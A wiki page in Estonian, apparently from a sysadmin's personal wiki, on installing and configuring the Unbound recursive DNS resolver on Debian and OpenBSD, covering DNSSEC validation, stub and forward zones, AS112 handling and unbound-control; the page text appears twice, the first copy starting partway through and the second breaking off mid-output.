* flags: qr rd ra ad - ad tähistab, et tegu on authoritative data sisaldusega

====DLV====

DLV seadistamiseks tuleb

* kopeerida trust anchor fail kataloogi /var/unbound/etc

# cd /var/unbound/etc
# ftp http://ftp.isc.org/www/dlv/dlv.isc.org.key

* Unbound seadistusfailis kasutada rida

dlv-anchor-file: "dlv.isc.org.key

Valideeritud nimepäringu vastus näeb välja nt selline

$ dig www.kaminskybug.se a +dnssec +multiline

; <<>> DiG 9.5.1-P3 <<>> www.kaminskybug.se a +dnssec +multiline
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56069
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.kaminskybug.se. IN A

;; ANSWER SECTION:
www.kaminskybug.se. 3590 IN CNAME fou.iis.se.
www.kaminskybug.se. 3590 IN RRSIG CNAME 5 3 3600 20100205210001 (
20100126210001 13358 kaminskybug.se.
goEav1vWK49WEvGY/G1EBKOgekQk11JvjsQxE7chH6Kg
OwZNpOXwomE1z9zvLcwkD60CQAZWC9psA1z01iIwtOrt
Yq6L+2A0PLVAAuRYeY3CQnbHoHRYClCUz0dIkxhtz9f/
Um1AuC3FtqV6t9q8lLb4ooav0Ex64KuwoPPxqqs= )
fou.iis.se. 3590 IN A 212.247.204.242
fou.iis.se. 3590 IN RRSIG A 5 3 3600 20100209131501 (
20100130131501 56315 iis.se.
BOPpSETDBKu6CjOcz2ULnOnfRVoXfOXj9OjW4zwjPuWl
7vJ8630yXsuSEe89RuH/ZsuOGbeJnumQ/XmD6ftWL9yM
MPUF1ZYxCtExaBcIxhxDIFJv4E4RZAOkbb9ZdYKTglIL
zDleOOms0iVgCAnnWJSnmDpzhfvr8xoTGlh7myE= )

;; AUTHORITY SECTION:
iis.se. 3590 IN NS ns.nic.se.
iis.se. 3590 IN NS ns3.nic.se.
iis.se. 3590 IN NS ns2.nic.se.
iis.se. 3590 IN RRSIG NS 5 2 3600 20100209131501 (
20100130131501 56315 iis.se.
B3SheLIv8ouVPpFGjvM8q5fl9ZMnnPWR8x9QDD0uSxoH
iV2fYHjiKC5a2+8Znsi4zSdO2AmH+reUCP74qvYpkl1K
+NbEzndzzrJQ0XlT1icy3MC6vdvgdE7Opqjab/7iIiYV
X9UjZpHKR284EljSrKJ0z53/T+12P3K0VU/dRFE= )

;; Query time: 1 msec
;; SERVER: 10.53.67.69#53(10.53.67.69)
;; WHEN: Sun Jan 31 00:25:39 2010
;; MSG SIZE rcvd: 648

kus ad lipp annab tunnistust, et vastus on valideeritud

flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

====Firefox DNSSEC lisa kasutamine====

Firefox DNSSEC lisa https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/ abil saab brauseri kasutamise ajal tagasisidet kuidas käesolev nimi on lahendatud, nt

[[Pilt:Unbound-1.gif]]

Seejuures tuleb arvestada, et DNSSEC iseenest tähendab, et nimi lahendes turvaliselt, järgneva andmevahetuse turvalisus on eraldi küsimus ja nt https:// on üks viis selle saavutamiseks.

===domain-insecure tsoonid===

Kui kasutatakse signeeritud tsoonifailiga juurnimeservereid ning mõnele lokaalsele mitte-dnssec nimeserverile viitavaid stub-zone sissekandeid, siis võib olla asjakohane kasutada lisaks ridu

domain-insecure: "auul"
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

===Lokaalsed nimekirjeldused===

Lisaks sellele, et Unboundi kasutab nimede lahendamisel võrgus töötavaid autoriteetseid nimeservereid, saab kirjeldada seadistusfailis päri- ja pöördteisendusi

local-zone: "loomaaed.tartu.ee" static
local-data: "loomaaed.tartu.ee A 192.168.10.100"
..
local-data-ptr: "192.168.10.100 loomaaed.tartu.ee"

kus

* local-zone - lokaalselt unboundis kirjeldatud tsooni nimi
* static - sellel positsioonil st type parameeter määrab põhiliselt, kuidas mitte kirjeldatud nime küsimisele vastatakse
* local-data - päriteisendus
* local-data-prt - pöördteisendus

type väärtused

* static - local-data abil mitte kirjeldatud nime küsimisele vastatakse NXDOMAIN
* nodefault - AS112 tsoonide puhul vastab Unbound vaikimisi NXDOMAIN vastusega, nodefault puhul püütakse vastavaid nimesid lahendada
* transparent - local-data abil mitte kirjeldatud nimi püütakse lahenada internetist, stub-zone abil vms viisil
* redirect - kõik alamdomeenid vastatakse local-data abil näidatud väärtusega

===Stub tsoon===

Stub tsooni abil saab öelda, millist pädevat nimeserverit kasutada mõne domeeni nimelahenduseks. Praktiliselt võiks seda vaja minna kui asutuses on nt kasutusel mitte-avalik pädev nimeserver ja domeeni 'auul.' nimede lahendamiseks tuleks kasutada seda; vastasel korral püüaks Unbound neid nimesid lahendada pöördudes interneti juurnimeserverite poole.

Seadistusfailis kirjeldatakse stub tsoon selliselt

stub-zone:
name: "auul"
stub-addr: 192.168.1.251

kus

* name - domeeni nimi
* stub-addr - domeeni pädeva nimeserveri ip aadress
* stub sõna viitab asjaolule, et Unbound saab näidatud nimeserverilt otse vastuse kätte

Kui stub-zone abil on vaja teha mõne privaatsete aadressidega /24 subneti jaoks pöördteisendusi, siis tuleb tõenäoliselt kasutada koostöös selliseid direktiive

..
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

local-zone: "1.168.192.in-addr.arpa." transparent
local-zone: "2.168.192.in-addr.arpa." transparent
....

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

stub-zone:
name: "10.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

Oluline on panna tähele, et korrektsel juhul lahendatakse kirjeldatud tsoonid stub-addr nimeserveri poolt, muud privaatsed aadressid saavad vastuseks (vastuse genereerib Unbound ise)

$ dig -x 192.168.5.5
..
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1480
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800

Kui vastus on, siis midagi on valesti, sest Unbound on seda käinud internetis lahendamas

..
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 86400 IN SOA prisoner.iana.org. hostmaster.trex.fi. 1 604800 86400 2419200 86400

===Forward tsoon===

Forward tsooni abil saab öelda, millist rekursiivset nimeserverit kasutada mõne domeeni nimelahenduseks. Seadistusfailis kirjeldatakse forward tsoon selliselt

forward-zone:
name: "loomla.tartu.ee"
forward-addr: 10.172.20.10

kus

* name - domeeninimi
* forward-addr - rekursiivse nimeserveri aadress

Selleks, et suunata kõik päringud lahendamiseks edasi sobib kasutada

forward-zone:
name: "."
forward-addr: 10.172.20.10

===AS112 tsoonid===

AS112 tsoonide hulka kuuluvad sellised pöördteisenduse tsoonid, vaikimisi vastab AS112 tsooni tehtud päringutele Unbound NXDOMAIN (põhjusel, et sisemiste arvutite poolt tehtud pöördteisenduspäringud ei jõuaks avalikku võrku)

* 10.in-addr.arpa
* 16.172.in-addr.arpa
* ...
* 31.172.in-addr.arpa
* 168.192.in-addr.arpa
* 254.169.in-addr.arpa
* 2.0.192.in-addr.arpa
* 100.51.198.in-addr.arpa
* 113.0.203.in-addr.arpa

Lisaks lahendab Unbound vaikimisi mõlemas suunas localhost - 127.0.0.1 teisendust justkui oleks kirjeldatud (sarnaselt on kirjeldatud ka IPv6 ::1)

local-zone: "localhost." static
local-data: "localhost. 10800 IN NS localhost."
local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "localhost. 10800 IN A 127.0.0.1"
local-data: "localhost. 10800 IN AAAA ::1
..

local-zone: "127.in-addr.arpa." static
local-data: "127.in-addr.arpa. 10800 IN NS localhost."
local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

Selleks, et asutuse lokaalses autoriteetses nimeserveris kirjeldatud privaatsete aadresside pöördteisendused töötaksid tuleb kirjeldada vastava tsooni jaoks local-zone väärtusega nodefault

server:
...
local-zone: "168.192.in-addr.arpa." nodefault

ning nt 192.168.1 võrgu puhul näidata pädeva nimeserveri aadress

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.251

===Jõudlus===

* Unbound oskab kasutada mitut protsessorit ja nö keskpärasel riistvaral suudab teenidada kümneid tuhandeid päringuid sekundis.
* Unbound on 2-3 korda kiirem kui Bind.

===Klientprogrammi unbound-host kasutamine===

Klientprogramm unbound-host võimaldab nt kontrollida, kas nimelahenduse valideerimine töötab

# unbound-host -C unbound.conf -t A -v www.kaminskybug.se
[1264938168] libunbound[2566:0] notice: init module 0: validator
[1264938168] libunbound[2566:0] notice: init module 1: iterator
www.kaminskybug.se is an alias for fou.iis.se. (secure)
fou.iis.se has address 212.247.204.242 (secure)

===Haldusprogramm unbound-control===

Haldusprogrammiga unbound-control saab juhtida Unbound resolveri tööd ja küsida statistikat. Kuna unbound-control võimaldab resolveri töötamist oluliselt mõjutada, nt laadida cache sisu tekstifailist või resolveri seisata, siis peab hoolega jälgima, et unbound-control kasutamisele oleks seatud vajalikud piirangud.

====Unbound resolveri ettevalmistamine====

unbound-control suhtleb Unbound serveriga vaikimisi üle 953/tcp pordi. Osaliste autentimiseks kasutatakse avaliku-võtme tehnikat, vajalike võtmete genereerimiseks sobib kasutada unbound-control-setup utiliiti

# unbound-control-setup
...
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use

Tulemusena tekivad /var/unbound/etc kataloogi neli võtit, kask serveri ja kaks kliendi jaoks

unbound_control.key
unbound_control.pem
unbound_server.key
unbound_server.pem

unbound-control kasutamiseks tuleb vastav funktsionaalsus Unbound serveris sisse lülitada nt sektsiooniga

remote-control:
control-enable: yes
control-interface: 127.0.0.1

====unbound-control kasutamine====

Vaikimisi kasutab unbound-control Unbound serveri seadistusfaili, nt sobib alustuseks kasutada unbound serverit ja unbound-control utiliiti samas arvutis.

* Unbound resolveri oleku küsimine

# unbound-control status
version: 1.3.0
verbosity: 1
threads: 1
modules: 2 [ validator iterator ]
uptime: 1184 seconds
unbound (pid 23298) is running...

* Resolveri cacheist tsooni loomaaed.tartu.ee andmete kustutamine

# unbound-control flush_zone loomaaed.tartu.ee
ok removed 3 rrsets, 2 messages and 0 key entries

* Cache sisu esitamine

# unbound-control dump_cache

====Resolveri kasutusstatistika====

Üks unbound-control kasutusjuht on koguda resolveri kasutusstatistikat

# unbound-control stats_noreset

Praktiliselt on seda sobiv automatiseerida Munin või Cacti tarkvaraga, mida on kirjeldatud aadressil http://www.unbound.net/documentation/howto_statistics.html.

===Unbound ja NSD protsessid samas arvutis===

Unbound seadistusfailis sobib kasutada ridu

domain-insecure: "loomaaed.tartu.ee"
domain-insecure: "loomaaed.tartu.eu"
domain-insecure: "loomaaed.tartu.org"
...
stub-zone:
name: "loomaaed.tartu.ee"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.eu"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.org"
stub-addr: 10.193.0.53

===IPv6 kasutamine===

IPv6 kasutamiseks tuleb seadistusfailis näidata, millisel IPv6 aadressil protsess kuulab

interface: 2001:1530:90:11:192::53

ning lubada asjakohastest võrkudest teenuse poole pöörduda, nt

access-control: fd99::/64 allow

Lisaks tuleb arvestada seda, et nimepäringute lahendamiseks kasutab Unbound ise IPv4 ja IPv6 võrku.

===2026 kevad märkused===

====Tööpõhimõte - dns rebinding protection====

Väited

* private-address ja private-domain kasutamine toimub koostöös
* private-address määratleb, mida peetakse antud kasutusjuhtumil silmas privaatsete aadresside all
* private-domain loetleb domeenide nimed, mille alla kuuluvad kirjed võivad lahenduda privaatseteks aadressideks

* üks unbound protssess saab tegeleda ainult ühe komplekti domeenide ja ühe komplekti privaatsete aadressidega

====Tööpõhimõte - in-addr.arpa information leak protection====

* vaikimisi ei saada unbound as112/rfc1918 hulka kuuluvaid dns nimesid (nt 4.3.2.10.in-addr.arpa ptr kirje küsimust) edasi lahendamisele
* neid pole mõtet kuhugi lahendamisele saata, sest 1. isp forwarder nimeserver ei tea neid, 2. in-addr.arpa nimeserver ei tea neid
* väga tõsist otsest rünnet ei saa selliste päringute välja minemisest korraldada, aga tekib asjatu võrguliiklus ja võimalik, et sisemiste võrguaadressite nö tahtmatu disclosure
* local-zone abil saab teha erandeid mainitud as112 nimede lahenduses
* nende erandite vastuseid lahendab unbound ise, või saadab mõnele selleks ettevalmistatud lokaalsele pädevale nimeserverile lahendamiseks

local-zone erandi tegemine 168.192.in-addr.arpa jaoks

<pre>
..

local-zone: "168.192.in-addr.arpa" transparent

stub-zone:
name: "168.192.in-addr.arpa"
stub-addr: 10.192.0.53

...
</pre>

dns rebinding protection on vaikimisi välja lülitatud, st private-address ja private-domain väärtused on tühjad, kasutamine toimub nt selliselt

<pre>
private-address:
</pre>

====Misc====

Takerdub

<pre>
# apt-get install unbound
root@arv:~# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound-anchor
The following NEW packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound unbound-anchor
0 upgraded, 5 newly installed, 0 to remove and 49 not upgraded.
...

Setting up unbound (1.6.7-1ubuntu2.6+esm4) ...
Created symlink /etc/systemd/system/multi-user.target.wants/unbound.service → /lib/systemd/system/unbound.service.
Created symlink /etc/systemd/system/unbound.service.wants/unbound-resolvconf.service → /lib/systemd/system/unbound-resolvconf.service.
Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.

Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.
invoke-rc.d: initscript unbound, action "start" failed.
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (auto-restart) (Result: exit-code) since Tue 2026-06-16 11:21:17 EEST; 9ms ago
Docs: man:unbound(8)
Process: 5650 ExecStart=/usr/sbin/unbound -d $DAEMON_OPTS (code=exited, status=1/FAILURE)
Process: 5304 ExecStartPre=/usr/lib/unbound/package-helper root_trust_anchor_update (code=exited, status=0/SUCCESS)
Process: 5301 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Main PID: 5650 (code=exited, status=1/FAILURE)
Processing triggers for libc-bin (2.27-3ubuntu1.6+esm6) ...
Processing triggers for systemd (237-3ubuntu10.57+esm3) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root 5304 0.0 0.0 4636 896 ? Ss 11:20 0:00 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
unbound 5307 0.0 0.0 34596 7820 ? S 11:20 0:00 \_ /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v
</pre>

ning

<pre>
root@arv:~# systemctl status unbound
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (start-pre) since Tue 2026-06-16 11:33:15 EEST; 38s ago
Docs: man:unbound(8)
Process: 12287 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Cntrl PID: 12290 (package-helper)
Tasks: 2 (limit: 4915)
CGroup: /system.slice/unbound.service
├─12290 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
└─12293 /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v

Jun 16 11:33:15 arv.auul.pri.ee systemd[1]: Starting Unbound DNS server...
</pre>

lahenduse koht

<pre>
root@arv:~# head -n 10 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.

root@arv:~# head -n 20 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.
RESOLVCONF="true"
ROOT_TRUST_ANCHOR_UPDATE="true"

if [ -f /etc/default/unbound ]; then
. /etc/default/unbound

case "x$RESOLVCONF" in xfalse|x0|xno)
RESOLVCONF="false"
;;
esac
</pre>

t

<pre>
server:
interface: 127.0.0.1
port: 53
do-ip4: yes
do-ip6: no

access-control: 127.0.0.1/32 allow
module-config: "iterator"
verbosity: 1
use-syslog: yes
log-queries: yes

stub-zone:
name: "xxx.ee"
stub-addr: 192.168.1.111

forward-zone:
name: "."
forward-addr: 10.0.9.4
forward-addr: 10.0.9.5
</pre>

===Kasulikud lisamaterjalid===

* http://unbound.net/
* http://unbound.nlnetlabs.nl/pipermail/unbound-users/
* http://www.howtoforge.com/installing-using-unbound-nameserver-on-debian-etch
* http://www.nlnetlabs.nl/publications/dnssec_howto/index.html
* http://secspider.cs.ucla.edu/islands.html
* https://itar.iana.org/
* https://ns.iana.org/dnssec/status.html
* https://dlv.isc.org/
* http://en.wikipedia.org/wiki/AS112
* [[:Pädeva nimeserveri NSD kasutamine]]

Rekursiivse resolveri Unbound kasutamine operatsioonisüsteemiga Debian

2026-06-18T05:05:32Z

Imre: /* 2026 kevad märkused */

[[Kategooria:Interneti domeeninimede süsteem]]
===Sissejuhatus===

Üks võimalus liigitada nimeservereid või nimeserverite tarkvara on selle järgi, millised päringuid teenindatakse

* pädev ehk autoriteetne (ingl. k. authoritative) - vastab päringutele ainult nimeserveri tsoonifailis kirjeldatud andmete alusel; autoriteetsed nimeserverid teenindavad reeglina resolverite päringuid
* rekursiivne (ingl. k. recursive) - rekursiivne nimeserver ei sisalda nö oma tsoonifaili, st ta ei ole mingite vastuste osas autoriteetne; rekursiivne nimeserver teenindab mingi piiratud hulga klientide päringuid lahendades neid autoriteetsete nimeserverite abil ja seetõttu nimetatakse rekursiivset nimeserverit tihti resolveriks (ingl. k. to resolve - lahendama)

Unbound http://www.unbound.net/ resolveril on selliseid omadused

* rekursiivne - lahendab nö lõppkasutaja esitatud päringuid, nt sobib seadistada töökohaarvuti nimeserveriks
* vaheladustav (ingl. k. caching) - Unbound peab kord lahendatud vastust mõnda aega meeles, mis tähendab, et järgmisele samale päringule vastab ta kliendile kohe ja ei pea omakorda pöörduma vastuse saamiseks autoriteetsete nimeserverite poole
* valideeriv - toetab DNSSEC kasutamist
* IPv6 tugi

Rekursiivse resolveri vastutus on parimal võimalikul moel anda kliendi esitatud päringule vastus, seejuures

* kasutada vastuse koostamisel mitmete pädevate nimeserverite abi
* anda õige vastus - nt mitte ennast lasta eksitada cache poisoning tehnikatest, võimalusel kasutada DNSSEC vahendeid
* vastata kiiresti

===Unbound paigaldamine===

2011 aastal leidub paljude operatsioonisüsteemide paketihalduses Unbound tarkvara.

====Debian====

Debian Squeeze sisaldab versiooni 1.4.6 ja paigaldamiseks sobib öelda

# apt-get install unbound

====OpenBSD====

OpenBSD 5.4 sisaldab binaarse paketina versiooni 1.4.9 ja paigaldamiseks sobib öelda

# pkg_add unbound
unbound-1.4.20:libldns-1.6.16p0: ok
useradd: Warning: home directory `/var/unbound' doesn't exist, and -m was not specified
unbound-1.4.20: ok
The following new rcscripts were installed: /etc/rc.d/unbound
See rc.d(8) for details.
--- +unbound-1.4.20 -------------------
You should add:

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

to /etc/rc.conf.local to create a syslog socket in the unbound chroot.

Selleks, et /etc/rc.d/unbound skript töötaks, peab olema seadistatud unbound-control (127.0.0.1 pealt).

===Unbound seadistamine===

Resolveri seadistusfailis tuleb näidata muu hulgas

* juurnimeserverite aadressid
* millisel aadressil resolver päringuid teenindab
* millised kliendid saavad resolverit kasutada, tavaliselt kliendi src ip aadressi täpsusega

Unbound tööd juhib seadistusfail unbound.conf

* /etc/unbound/unbound.conf - Debian
* /var/unbound/etc/unbound.conf - OpenBSD

Lihtsamal juhul võib kasutada nt sellise sisuga seadistusfaili

server:
interface: 192.168.10.190
outgoing-interface: 192.168.10.190
access-control: 192.168.1.0/24 allow
access-control: 192.168.10.0/24 allow_snoop
root-hints: "/var/unbound/etc/named.cache"

kus

* interface - millisel aadressil arvuti Unbound resolveri kliente teenindab
* outgoing-interface - milliselt aadressilt resolveri päringud autoriteetsetele nimeserveritele väljuvad
* access-control - millistelt ip aadressidelt saab Unbound resolverit kasutada; allow lubab esitada ainult rekursiivseid päringuid, nt +norec annab vaikimisi refused vastuse

$ dig +norec @nimeserver domeeni.nimi
...
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 52133

allow_snoop lubab mõlemaid (viimane on vajalik, et unbound kasutaja saaks öelda

$ dig +trace @nimeserver domeeni.nimi

* root-hints - resolver peab alati teadma interneti juurnimeserverite aadresse

Juurnimeserverite aadresse saab küsida mõnes juba seadistatud resolveriga arvutis

$ dig . ns

või kopeerida aadressilt Linuxis

$ wget ftp://FTP.INTERNIC.NET/domain/named.cache

OpenBSD keskkonnas

$ ftp ftp://FTP.INTERNIC.NET/domain/named.cache

===Unbound käivitamine===

Unbound resolver teenindab päringuid portidel 53/udp ja 53/tcp.

====Debian====

Käivitamiseks tuleb öelda

# /etc/init.d/unbound start | stop

====OpenBSD====

Selleks, et Unbound töötaks OpenBSD all chroot keskkonnas kataloogis /var/unbound kasutajana _unbound tuleb kasutada seadistusfailis rida

chroot: "/var/unbound"

Et chroot keskkonnas töötav Unbound saaks logida syslog'i tuleb syslog käivitamisel lisaks kasutada '-a /var/unbound/dev/log'

# syslogd -a /var/www/dev/log -a /var/empty/dev/log -a /var/unbound/dev/log

/etc/rc.conf.local failis sobib kasutada rida

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

2012 kevadel ütleb OpenBSD v. 5.1 paketihalduse unbound chroot kasutamisel kävitamisel nii

# unbound -dv
[1335943357] unbound[20534:0] notice: Start of unbound 1.4.15.
[1335943357] unbound[20534:0] warning: increased limit(open files) from 128 to 4140
[1335943357] unbound[20534:0] warning: unable to setusercontext _unbound: Bad file descriptor

Limiitide tuleb töötada sarnaselt nagu on kirjeldatud aadressil http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_OpenBSD_kasutamine#Login_class_kasutamine.

Tavalisel viisil sobib kasutada käivitusskripti

# /etc/rc.d/unbound start | stop

Vastasel korral on logis midagi sellist

Mar 13 16:03:01 unbound[28759:0] error: can't create socket: Too many open files

===Unbound kasutamine===

Unbound resolveri kasutajateks on tavaliselt arvutid, mis vajavad nimelahendust, nt kohtvõrgu arvutid, eposti serverid jt kusjuures Unbound protsess töötab selleks ettenähtud arvutis või võrgusõlmeks olevas seadmes

internet
...
|
_|_
| | OpenBSD võrgusõlm
|___| Unbound protsess
|
--|---|----------|-----------|--
| | |

dns kliendid (töökohaarvuti, serverid)

Linux keskkonnas sobib näidata nimeserveri aadress staatiliselt arvuti /etc/resolv.conf failis nt reaga

nameserver 192.168.10.190

Unbound resolveri tööd saab kontrollida nt öeldes mõnes arvutis, kus peab kõnealust resolverit saama kasutada

$ dig @192.168.10.190 kuutorvaja.eenet.ee a

ja vastus peaks sisaldama sarnaseid ridu rida

...
;; QUESTION SECTION:
;kuutorvaja.eenet.ee. IN A

;; ANSWER SECTION:
kuutorvaja.eenet.ee. 83840 IN A 193.40.0.7
..

===Nimepäringu vastuse valideerimine===

Nimepäringute vastuste valideerimiseks kasutatakse üldiselt DNSSEC tehnikat. 2011 aastal on selleks mitmeid võimalusi, kaks populaarsemat on

* signeeritud tsoonifailidega juurnimeserverite kasutamine, kõige loomulikum viis
* DLV (DNSSEC Look-aside Validation) - üleminekuaja häkk

Kui nimeteenust kasutatakse sarnaselt ülaltoodud skeemile, siis peab arvestama, et DNSSEC kontroll toimub Unbound protsessi juures, sealt edasi kliendini liigub vastus tavalise avateksina üle kohtvõrgu ja klient otsustab vastuse turvalisuse üle ad biti järgi vastuses. Seetõttu on reeglina soovitav, et Unbound töötaks nimeteenust kasutatavatele arvutitele võimalikult lähedal.

DNSSEC juurutamise kronoloogia

* 15. juuli 2010 - juurnimeserverid kasutavad signeeritud tsoone http://www.root-dnssec.org/
* ? - .org tsoon on signeeritud
* 31. märts 2011 - .com tsoon on signeeritud http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/

Kasulikud lisamaterjalid

* http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/
* http://blogs.pcmag.com/securitywatch/2011/03/dnssec_in_com_domain_is_a_good.php

====Signeeritud tsoonifailiga juurnimeserverite kasutamine====

Unbound seadistamiseks tuleb kasutada seadistusfailis rida

auto-trust-anchor-file: "root.key"

kusjuures fail peab olema unbound protsessile kirjutatav ning esialgselt sisaldama rida (as per http://unbound.net/documentation/howto_anchor.html)

# cat /var/unbound/etc/root.key
. IN DS 19036 8 2 49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5

# chown _unbound /var/unbound/etc
# chown _unbound:_unbound /var/unbound/etc/root.key

Peale unbound protsessi käivitamist selle faili sisu muutub automaatselt.

Kontrollimiseks sobib öelda

$ dig . ns +dnssec +multiline

; <<>> DiG 9.7.2-P3 <<>> . ns +dnssec +multiline
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4737
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 518267 IN NS m.root-servers.net.
. 518267 IN NS g.root-servers.net.
. 518267 IN NS b.root-servers.net.
. 518267 IN NS h.root-servers.net.
. 518267 IN NS a.root-servers.net.
. 518267 IN NS e.root-servers.net.
. 518267 IN NS k.root-servers.net.
. 518267 IN NS f.root-servers.net.
. 518267 IN NS c.root-servers.net.
. 518267 IN NS j.root-servers.net.
. 518267 IN NS i.root-servers.net.
. 518267 IN NS l.root-servers.net.
. 518267 IN NS d.root-servers.net.
. 518267 IN RRSIG NS 8 0 518400 20110409000000 (
20110401230000 34525 .
De4SFgTDwpgbz1JjTlaPzu7ZNRURLSnoYmQQQIZq7Gny
RghOrsvS1soH5F43Gxr5BIi+422EBLJIrEHFnbvLy22S
LqKtSw67eDdsBZyjE5fTtDHyYhnoR8YQWswgGVMRk4Ek
iDDMIOk5pF+CvbML6TlvTWrnPCwNWXnbLFnT9SY= )

;; Query time: 0 msec
;; SERVER: 10.192.0.53#53(10.192.0.53)
;; WHEN: Sat Apr 2 18:44:16 2011
;; MSG SIZE rcvd: 397

kus tuleb tähele panna

* vastus sisaldab RRSIG kirjet
* flags: qr rd ra ad - ad tähistab, et tegu on authoritative data sisaldusega

====DLV====

DLV seadistamiseks tuleb

* kopeerida trust anchor fail kataloogi /var/unbound/etc

# cd /var/unbound/etc
# ftp http://ftp.isc.org/www/dlv/dlv.isc.org.key

* Unbound seadistusfailis kasutada rida

dlv-anchor-file: "dlv.isc.org.key

Valideeritud nimepäringu vastus näeb välja nt selline

$ dig www.kaminskybug.se a +dnssec +multiline

; <<>> DiG 9.5.1-P3 <<>> www.kaminskybug.se a +dnssec +multiline
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56069
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.kaminskybug.se. IN A

;; ANSWER SECTION:
www.kaminskybug.se. 3590 IN CNAME fou.iis.se.
www.kaminskybug.se. 3590 IN RRSIG CNAME 5 3 3600 20100205210001 (
20100126210001 13358 kaminskybug.se.
goEav1vWK49WEvGY/G1EBKOgekQk11JvjsQxE7chH6Kg
OwZNpOXwomE1z9zvLcwkD60CQAZWC9psA1z01iIwtOrt
Yq6L+2A0PLVAAuRYeY3CQnbHoHRYClCUz0dIkxhtz9f/
Um1AuC3FtqV6t9q8lLb4ooav0Ex64KuwoPPxqqs= )
fou.iis.se. 3590 IN A 212.247.204.242
fou.iis.se. 3590 IN RRSIG A 5 3 3600 20100209131501 (
20100130131501 56315 iis.se.
BOPpSETDBKu6CjOcz2ULnOnfRVoXfOXj9OjW4zwjPuWl
7vJ8630yXsuSEe89RuH/ZsuOGbeJnumQ/XmD6ftWL9yM
MPUF1ZYxCtExaBcIxhxDIFJv4E4RZAOkbb9ZdYKTglIL
zDleOOms0iVgCAnnWJSnmDpzhfvr8xoTGlh7myE= )

;; AUTHORITY SECTION:
iis.se. 3590 IN NS ns.nic.se.
iis.se. 3590 IN NS ns3.nic.se.
iis.se. 3590 IN NS ns2.nic.se.
iis.se. 3590 IN RRSIG NS 5 2 3600 20100209131501 (
20100130131501 56315 iis.se.
B3SheLIv8ouVPpFGjvM8q5fl9ZMnnPWR8x9QDD0uSxoH
